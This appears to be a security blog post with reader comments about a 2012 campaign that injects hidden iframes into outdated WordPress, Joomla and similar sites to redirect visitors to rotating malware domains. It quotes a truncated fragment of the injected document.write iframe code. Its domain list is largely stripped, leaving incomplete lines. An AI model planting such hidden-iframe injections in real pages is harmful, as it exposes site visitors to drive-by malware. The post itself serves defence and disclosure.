New Web Malware Attacks Using .Ru/In.CGI?16

What does an orange roller, a purple beetle, an orange moth, a green pillar, and a green cricket have in common? Not much, but they are all being used as malware domains to distribute .Ru/In.CGI?16 which is affecting thousands of web sites lately.

This is what is showing up on the compromised sites:

document.write("<iframe src="" name="Twitter"
scrolling="auto” frameborder="no” align="center” height="2″ width="2..

See the domain? This keeps changing many times per day. Here are the domains we detected over the last couple of days, along with the number of sites compromised by them:

849 iframe – (
821 iframe – (
772 iframe – (
529 iframe
430 iframe
198 iframe
172 iframe
162 iframe
145 iframe
91 iframe
90 iframe
30 iframe
23 iframe
10 iframe
62 iframe
59 iframe
52 iframe
52 iframe
48 iframe
46 iframe
.. many more..

Not all of the domains are in the .ru domain range (like and a few others), but the majority are. As far as registration time, most of them are very new domains and only being used to distribute malware:

person: Private Person
registrar: REGRU-REG-RIPN
created: 2012.07.15
paid-till: 2013.07.15
free-date: 2013.08.15

What happens to someone that visits the hacked site?

When someone visits a compromised site, they get redirected to ( where a malicious payload is dropped. This malicious payload is only detected by 1 out of 42 anti virus (Avast):

How are the sites getting hacked?

We are seeing this malware across all types of sites and hosts, and all of them we checked were outdated (either WordPress, Joomla, vBulletin, and the good old TimThumb script). So, if you own a web site make sure that it is always updated. If you have any questions, let us know.

      1. Ciao, io ho fatto l’aggiornamento, ho reinstallato il tema ma sono stato colpito per la terza volta dal malware… che faccio!

    1. I had several sites hacked on 18th July.

      I used the excellent Firebug addon to Firefox to examine the html and the scripts being run.

      On one site I had to clean 6 javascript files that were infected.

      In my case (Joomla sites), I believe it was due to an infection in mootools which is used by many other modules plugins and components.

      The files that were infected were:

      /media/system/js/modal.js/components/com_k2/js/k2.js/modules/mod_roktabs/tmpl/roktabs_nt1_2.js/modules/mod_jw_sir/mod_jw_sir/mod_jw_sir.js/plugins/system/mtupgrade/mootools.jsHope this helps some othersCheersMike Paterson

  1. i have 4 webs infected 3 prestashops and 1 wordpress what can I do ? please help

  2. It seems to be a security problem of the server administration software Plesk (by Parallels). Have a look there …

Comments are closed.

You May Also Like